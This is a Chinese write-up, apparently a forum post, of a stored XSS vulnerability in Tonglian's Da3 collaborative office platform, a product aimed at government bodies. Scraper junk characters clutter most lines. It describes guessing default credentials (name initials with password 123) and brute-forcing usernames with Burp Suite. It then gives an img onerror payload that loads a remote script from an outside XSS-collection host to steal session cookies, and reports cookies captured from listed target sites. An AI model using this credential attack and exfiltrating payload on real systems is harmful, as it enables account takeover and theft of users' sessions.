( l- O% r- A9 ?2 f6 K, r3 ?, f
1 ^, M- L, j# z3 l* E+ a 同联Da3协同办公平台后台通用储存型xss漏洞
M$ X/ Z/ a" n) w) m
( l1 o/ q) ~! k; R7 ^/ N+ \, S
! s$ ?: N" h# ?1 n, d, e4 T6 J
平台简介:
! {$ d S( D+ \. Y
: u% [7 r8 I# k# M * n3 s) p9 ]' n8 c- n& |5 i. {
% K$ ^2 H8 T+ C4 S% o
|8 _9 Z6 _+ _: G% m
5 x* W' o6 ?2 [% O- F n 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ P; p7 c7 f' s: D3 W同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% y( Q! J0 y' e/ s4 W同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!% ^% z4 y# A. n$ u1 k
6 L. l$ q3 L% {: p- [
) X7 R- |7 a- ?! b4 S& |3 S) ?. ?
3 d& Q) x/ Q; R. w0 r) {
. \' r1 f- k9 a/ d+ _; W
: F4 f$ P9 u, y! [- |
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 O& f; {( v( l! j# [
4 p$ j( \& J0 F9 Q$ E7 w# T
# O5 z% m3 }. {1 K6 \* M
: ~+ ?$ v/ u. U1 g
, Y( F: g" m+ [) ^
0 C. h( v) h# q http://1.1.1.1:7197/cap-aco/#(案例2-)4 W8 s; a. f3 Z4 }- r* |
- Y$ f1 A1 [3 \! [% \
2 z6 q6 `1 {. g7 D! ~8 U
http://www.XXOO.com (案例1-官网网站) i; Q; G1 U) i% |# ^' A9 t6 F
5 }# [0 h. U R* C0 j% ?
3 J. d0 Y+ A6 V; i) x5 e. {. H 漏洞详情:
# F3 D, y4 E5 d. |6 E$ Y
5 W5 X& Y. o% B$ [. r
& h/ k0 `# l2 p+ g. Z& f 案例一、, B9 M* @& y/ ~7 m3 ?
2 I! Q( i' a! I, `: K( g v
; N" x1 m$ N! N* n6 {/ Y7 v
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
3 W- a. P& a& @: ~! s' ~
4 B8 F, k: n0 o! T1 k5 L
" X. d% m( k# y# J
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; N, Y6 U1 S# K- C* U
4 G, \% X/ y' |9 w0 F 0 @/ z H0 M5 m1 a9 `. k$ \
+ G9 E8 |$ X5 _& x7 y4 u! ^8 v
+ K9 \+ A# a. e$ k
+ L' g/ N; Q/ p7 B% ^ E
. C9 X1 `6 P. Q6 V4 Q* ]7 K6 Z
: F8 G, [- e2 u! x3 ^. u! f2 ?
. E- b) \& U K2 f. f
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
6 j+ K0 s. J; I
, K3 ^) g" C; J
S$ o# S7 p+ J1 ?7 @ H
% P4 Z* k! I0 h. {& K# G
% l w" I: v# A) X# L' [: q; x/ @1 M
! n: G5 G, U. V : j! q0 w; T& U
1 E }- }5 D/ s $ b2 p5 R g; m0 r% G
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
3 R! r: d/ I9 v/ Z
$ e, ~7 D$ F& y! E$ h
1 B% ~- k9 j$ D: {- v8 U# L9 u6 N # @7 q3 t1 X7 q* v- m& b# L3 h
7 { {7 l* }! {3 C% I E3 O/ }
+ |4 F+ e0 O+ N* V" @! P7 o0 S
<img src=x
+ q2 {2 v4 z" Y, o" Q& E5 h" B7 f; Oonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: . `" G; I0 f; W0 b2 x
! w+ z7 s6 v' k" C/ G
/ A- t' a7 a8 w& a& C% Y
4 Z/ A/ {( I# s* G0 g
( D7 p( u8 i% p% _0 d8 E8 ~6 k , d; {- }1 y! n1 |: k* A% A) {
然后发送,接收cookie如图: * t, r/ q/ w8 g9 \+ B2 {2 p
0 s8 u( F3 Z$ A
2 ~6 X6 j8 \8 f6 P1 H; R
/ P( c2 i4 `; J& A; v; Q
( w+ f3 Y. s( D
1 D2 B0 W8 j0 C$ ^ . R/ w( Q8 l- V
, c: V) X: m% h1 k- H- L r/ e& R; ]( k) p- Z3 d4 Q
0 J. N9 a, S: k
% x! \. i9 }8 W: x2 k0 m) ?5 [
5 k2 |* U+ g. S( B
* Y, k0 H4 t% K" v$ @3 A
" A" c: t2 d+ m- U: c# r
7 [+ Z' Q+ c- i: [ P
* ^% D% z% P1 ~, ^0 X4 F
$ G G4 ]) A7 e6 t
" S6 N2 P- U2 |1 Q
% _( K$ R" M# U9 x: C
. ~' A5 g6 X% _% E
6 ?" @6 ]6 K" E/ ?
' _# F! C5 J9 l0 n. H/ V
4 X0 |8 q- C2 |; b
$ @ V# R& O+ Z/ H/ o) u% q
案例2、
8 @, l! { d- T+ s
1 b1 J, j4 Y$ u
; _ u* }' P8 _" ]" D 前面步骤都一样,下面看效果图: 7 }) ^9 H- }6 ^3 ^
' O8 G/ a" F) d( M7 e
" K/ J: Y" B: R U . f _, F8 f$ z% k$ @5 {
0 h1 J* x+ @ n4 R5 W6 t
) n1 g" w/ _$ C. D' n9 o 2 `3 G8 K8 c8 k3 K# C
$ P/ g# D, H3 [- W+ V, C& F
8 U8 c# O# w4 k5 C- {
; i& L6 S! U1 R" }) K T
g5 A( ?+ I, s b/ }/ q, x& a" M7 a* ^
/ x7 o9 w! x5 U# j x% Z
2 \9 t# F! A. t/ o
. [8 i7 B# o+ p) L% B! M. T
1 }% O/ b8 c& C I0 ?
0 V% G1 l. {& x 1 w- L; e( I! `' E$ f' k0 A1 ~5 [
( S" x# M5 x5 j- m4 W- Z1 J
7 c. W$ e0 ?4 ?0 k9 y
% k" p; o4 x/ X
$ B/ b( N* U1 q# [
/ V6 N1 i. d! D; N" J0 k( q, {) Q # j: I y+ N* U0 b8 `, c
1 m L+ ?0 M$ p$ t# m9 x; ]# ]
2 N+ m/ D: a9 F5 Z
; }* d/ o' ?# l- O2 D; n& h6 S 9 J6 f. N7 P0 R- X- d( A7 z
7 p3 N# Q% Q+ D3 f